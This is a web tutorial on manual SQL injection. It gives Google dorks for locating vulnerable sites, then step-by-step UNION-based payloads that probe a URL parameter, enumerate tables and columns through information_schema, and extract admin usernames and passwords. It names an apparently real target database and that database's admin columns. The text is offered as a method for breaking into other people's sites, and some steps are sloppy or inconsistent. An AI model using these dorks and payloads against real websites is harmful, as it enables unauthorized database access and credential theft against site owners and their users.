SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.Need to find out a sql vulnerable site : To find a sql vulnerable website we will use some google Dorks from following:
inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:Pageid=
Step 1: Finding Vulnerable Link –
http://www.site.com/news.php?id=3
Add ‘ After id=3
If SQL Syntax Error is shown or blank page then site is Vulnerable to SQL Injection.
Step 2: Finding Vulnerable Columns –
http://www.site.com/news.php?id=3
order by 8 —
if again error is shown or blank page occured then
Vulnerable columns are 7.
Step 3: Finding Number of Vulnerable Columns:
http://www.site.com/news.php?id=3
union all select 1,2,3,4,5,6,7 —
if number 2 is shown then this column can give us database,tables & columns
Step 4 Finding Database
union all select 1,database(),3,4,5,6,7 —
chennaisilks
Step 5: Finding Table Names:
http://www.site.com/news.php?id=3
union all select 1,table_name,3,4,5,6 from information_schema.tables wheretable_schema=’chennaisilks’ —
Step 6: Finding Column Names:
http://www.site.com/news/php?id=3
union all select 1,column_name,3,4,5,6,7
from information_schema.columns where
table_schema=’chennaisilks’ —
Admin table is admin
Admin Columns are
admin_id
user_id
admin_pwd
admin_email
admin_last_login
admin_ip
Step 6: Finding Admin username & password:
http://www.site.com/news.php?id=3
union all select 1,user_id,3,4,5,6,7 from admin —
union all select 1,admin_pwd,3,4,5,6,7 from admin —